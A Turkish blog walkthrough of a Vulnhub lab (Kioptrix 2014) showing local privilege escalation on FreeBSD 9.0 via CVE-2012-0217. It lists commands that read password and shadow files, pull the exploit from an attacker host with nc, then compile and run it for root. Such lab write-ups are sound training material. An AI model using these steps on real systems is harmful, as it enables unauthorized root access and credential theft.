FreeBSD 9.0 İşletim Sistemindeki Hak Yükseltme Zafiyetinin (Intel SYSRET) İstismar Edilerek root Yetkileri ile Komut Satırının Elde Edilmesi

0
260
views
Linux sızma testleri sırasında standart haklar ile erişim sağlanabilmiş bir bilgisayarda, hak yükseltilerek yönetici hakları elde edilmeye çalışılır. Hak yükseltmek için kullanılan yöntemlerden birisi de işletim sistemindeki zafiyetlerin istismar edilmesidir. Bu yazıda, FreeBSD 9.0 işletim sistemine sahip Kioptrix: Seviye – 1.4 (#5) sanal makinesi üzerinde çalışan bir zafiyet (CVE-2012-0217) istismar edilerek standart kullanıcı haklarından “root” kullanıcısı hakkı ile komut satırı / kabuk elde edilecektir.

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

Yazıda kullanılan Kioptrix: Seviye – 1.4 (#5) sanal makinesi Vulnhub sitesinden indirilebilir.

https://www.vulnhub.com/entry/kioptrix_2014-5,62/

Linux işletim sistemine standart yetkilerle elde edilen erişimde uygulama kullanıcısı (www) haklarına sahip olunduğu görülmektedir.

id
head -3 /etc/passwd
head -3 /etc/shadow

 

İşletim sisteminin sürüm bilgilerine bakıldığında FreeBSD 9.0 olduğu görülmektedir.

uname -a
grep -Ev “^#” /usr/src/sys/conf/newvers.sh | head -5

 

FreeBSD 9.0‘da bir takım zafiyetler bulunmaktadır. Bu zafiyetlerden birisi de CVE-2012-0217 ile kimliklendirilen “FreeBSD 9.0 – Intel SYSRET Kernel Privilege Escalation” zafiyetidir.

searchsploit FreeBSD 9.0 | grep -v “/dos/”

 

Zafiyete ait istismar kodu C dili ile yazılmıştır. 28718.c istismar kodunun transferi için bir yöntem olarak web servisi başlatılmıştır. Ancak kurban işletim sisteminde “wget” ve “curl” gibi araçlar olmadığı için “nc” aracı ile bu dosya aktarılmıştır.

cp /usr/share/exploitdb/platforms/freebsd/local/28718.c .
nc -nlvp 3333 < 28718.c

wget
curl
nc 172.20.50.128 3333 > /tmp/HakYukseltme.c
ls -la /tmp/

 

Aktarılan istismar kodu derlenir.

cd /tmp
gcc -o Yukselt HakYukseltme.c
ls -la Yukselt

 

Sonrasında çalıştırılır ve “root” yetkilerine erişim sağlanılmış olur.

./Yukselt
id
head -5 /etc/master.passwd

 

Kaynak:

Hack the Kioptrix VM (CTF Challenge)

 

 

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

CEVAP VER

Yorumunuzu giriniz
İsminizi giriniz

Bu site, istenmeyenleri azaltmak için Akismet kullanıyor. Yorum verilerinizin nasıl işlendiği hakkında daha fazla bilgi edinin.